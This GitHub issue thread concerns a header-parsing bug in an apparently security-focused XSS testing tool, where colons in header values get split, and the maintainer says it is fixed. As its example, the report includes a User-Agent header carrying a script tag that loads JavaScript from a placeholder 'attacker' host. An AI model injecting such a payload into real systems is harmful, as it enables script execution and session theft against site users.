### ISSUE TITLE
Can't insert colon in header

### ISSUE THREAD

**Issue by matteodelta** [ferreiraklet/airixss#7]
Hi,
It's not possibile to insert colon and semicolon in header since the program split header and value when there's a colon or semicolon. For Example if you insert the following header: 
"User-Agent: <script src="http://attacker/xss.js"></script>

The header is truncated becoming "User-Agent: <script src="http"

I thinks should be used a different simbols for splitting.
And maybe there's a way to escape these characters but i didn't find it. Thanks

**Comment by ferreiraklet** [comment]
Ohhh, Thank you buddy, Im now looking forward a solution,

**Comment by ferreiraklet** [comment]
Heyy mannn, with the update that i made now, it should be fixed, i ask you to try again. - Klet
